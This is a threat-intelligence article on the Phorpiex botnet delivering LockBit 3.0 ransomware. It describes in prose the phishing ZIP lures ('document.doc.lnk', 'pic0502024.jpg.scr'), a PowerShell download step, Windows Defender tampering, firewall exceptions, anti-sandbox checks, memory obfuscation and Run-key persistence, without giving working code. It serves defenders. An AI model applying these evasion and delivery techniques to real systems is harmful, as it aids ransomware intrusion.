A Dangerous Pair with Phorpiex Botnet Expanding LockBit Ransomware Attacks

The Phorpiex (aka. Trik) botnet has gained greater relevance in the threat landscape with elevated severity due to its newfound role in distributing LockBit 3.0 ransomware. Active since 2010, Phorpiex has historically been associated with malware distribution, spam campaigns, and cryptocurrency mining. Its integration with LockBit expands the ransomware’s potential impact across industries. This finding, reported by Cybereason analysts Mahadev Joshi and Masakazu Oku, further warns of the streamlined infection process, as "the LockBit downloader variant of Phorpiex downloaded LockBit right away without expanding the infection area within the victim's network." This automation contrasts with traditional ransomware campaigns, which typically require human operators to execute attacks. The rapid nature of infection enabled by Phorpiex presents an increased risk, with minimal changes observed in the botnet’s source code since its sale in 2021.

Variances in delivery were reported, with a phishing email and ZIP file serving as the common starting point of the attack chain. The infection then diverges, with its pathway determined by the file type within the ZIP: an SCR file is used for LockBit infections, while an LNK shortcut file is associated with the TWIZT variant of Phorpiex. The LNK attack chain disguises a malicious file as "document.doc.lnk," which calls CMD to execute a PowerShell command to download "windrv.exe"—a TWIZT downloader—into the victim’s %userprofile% directory. In contrast, the SCR attack chain presents itself as "pic0502024.jpg.scr" and connects to a LockBit-controlled IP address to download the ransomware binary into the %TEMP% folder. While Cybereason’s analysis did not observe an active connection at the time, historical intelligence from Proofpoint links the IP to LockBit.

The Phorpiex malware family includes multiple downloader variants, each exhibiting distinct behaviors while maintaining commonalities such as Zone.Identifier removal. Cybereason analysts identified that the LockBit Downloader variant performs URL cache deletion, presumably to prevent broken caches from interfering with the downloading process. The TWIZT variant introduces a JPEG file check to avoid reinfecting already compromised hosts—"This procedure verifies the machine is a new host to avoid re-infecting it." GandCrab, another Phorpiex-related downloader, modifies the Windows Registry to impair Windows Defender’s AntiSpyware feature and adds its process path to the authorized applications list in the firewall policy. Its capabilities also include anti-sandbox checks and execution flow obfuscation. Specifically, for runtime execution flow, obfuscation is achieved by dynamically decrypting and replacing the .text section of the process memory, rendering traditional signature-based detections ineffective.

Additionally, the TWIZT and GandCrab variants establish persistence via the Run registry key, a feature absent in the LockBit Downloader. The comparison of variants emphasizes the risks associated with the botnet and its malware variants. The combination of automation, rapid deployment, and defense evasion techniques makes this resurgence of Phorpiex a significant security concern, as its integration with LockBit could dramatically increase ransomware infections across various industries.